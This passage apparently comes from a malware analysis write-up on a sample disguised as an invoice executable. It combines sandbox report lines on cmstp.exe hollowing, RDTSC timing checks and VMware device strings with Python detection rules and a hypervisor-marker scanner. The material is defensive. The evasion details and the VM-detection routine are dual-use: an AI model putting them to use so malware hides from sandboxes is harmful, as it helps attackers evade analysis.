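    findings = []
    for e in events:
        img = basename(e.image)
        # 1. cmstp.exe is a LOLBin that legitimately runs with a .inf profile;
        #    an instance with no arguments exists only to be hollowed.
        if img == "cmstp.exe" and arguments(e.cmdline) == "":
            findings.append(("cmstp_no_args", e.pid, e.parent_image))
        # 2. cmd.exe deleting an .exe that is neither its parent nor grandparent:
        #    an uninstaller deletes itself, an injected host deletes someone else's dropper.
        if img == "cmd.exe":
            m = DEL_RE.search(e.cmdline)
            if m:
                target = m.group("target").lower()
                lineage = {e.parent_image.lower()}
                parent = by_pid.get(e.ppid)
                if parent:
                    lineage.add(parent.parent_image.lower())
                if target not in lineage:
                    findings.append(("foreign_self_delete", e.pid, target))
        # 3. A process launching a second copy of its own image: the re-launch step
        #    this .NET loader performs before injecting the payload.
        if e.image.lower() == e.parent_image.lower():
            findings.append(("self_respawn", e.pid, e.image))
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

Rule 2 deliberately looks two generations up: the deleted file is the grandparent of cmd.exe only in the benign uninstaller case, whereas here cmd.exe's parent is cmstp.exe and its grandparent is explorer.exe, so the target is foreign to the lineage and the finding fires.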
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Process information set: NOOPENFILEERRORBOX (31 identical entries)
          Source: C:\Windows\SysWOW64\cmstp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 0000000002D38604 second address: 0000000002D3860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 0000000002D3899E second address: 0000000002D389A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe TID: 6708 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000004.00000000.743466087.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.739552326.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.743692325.000000000A716000.00000004.00000001.sdmp | Binary or memory string: 0d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&[
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&[
          Source: explorer.exe, 00000004.00000000.736762882.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
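The explorer.exe memory strings above (the NECVMWar / VMware SATA CD-ROM and VMware Virtual_disk device names) are exactly the artefacts a hypervisor check looks for, and they occur in mixed case and, in a Windows process, in both ASCII and UTF-16LE form, which is why any scan for them has to normalise case and try both encodings. The scanner below is an added example and not part of this report or of Joe Sandbox: it finds those markers in a memory buffer and reports encoding and offset. The buffers are constructed for the example; the marker list is an assumption drawn from the device names in this report plus the usual VirtualBox and QEMU vendor strings.

```python
# Added example: scan a memory buffer for hypervisor device-name artefacts in both
# ASCII and UTF-16LE, case-insensitively. Buffers and marker list are constructed.

VM_MARKERS = ("vmware", "necvmwar", "virtual_disk", "vbox", "virtualbox", "qemu")


def scan_vm_markers(buf: bytes, markers=VM_MARKERS):
    """Map marker -> list of (encoding, offset) hits, case-insensitive."""
    low = buf.lower()   # lowers ASCII bytes only; UTF-16LE ASCII-range code units survive intact
    hits = {}
    for marker in markers:
        for enc in ("ascii", "utf-16le"):
            needle = marker.encode(enc)
            start = 0
            while (i := low.find(needle, start)) >= 0:
                hits.setdefault(marker, []).append((enc, i))
                start = i + 1
    return hits


def is_probably_vm(buf: bytes) -> bool:
    return bool(scan_vm_markers(buf))


# Constructed buffers (not dumps from the analysis): one carrying the VMware SATA
# CD-ROM and virtual-disk device names the report lists, one from a physical-looking disk.
ASCII_DEV = rb"\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000"
WIDE_DEV = r"SCSI\Disk&Ven_VMware&Prod_Virtual_disk".encode("utf-16le")
VM_MEMORY = b"\x00" * 64 + ASCII_DEV + b"\x00" * 32 + WIDE_DEV + b"\x00" * 16
CLEAN_MEMORY = b"\x00" * 32 + rb"\\?\scsi#disk&ven_samsung&prod_ssd_870" + b"\x00" * 16

if __name__ == "__main__":
    for marker, where in scan_vm_markers(VM_MEMORY).items():
        print(marker, where)
    print(is_probably_vm(CLEAN_MEMORY))   # False
```

The same routine run over a sandbox's own process memory tells the analyst which strings the guest leaks; the fix on the sandbox side is to rename the virtual devices rather than to hook the string APIs, because the sample reads these values out of explorer.exe memory and the registry, not through a single API that could be filtered.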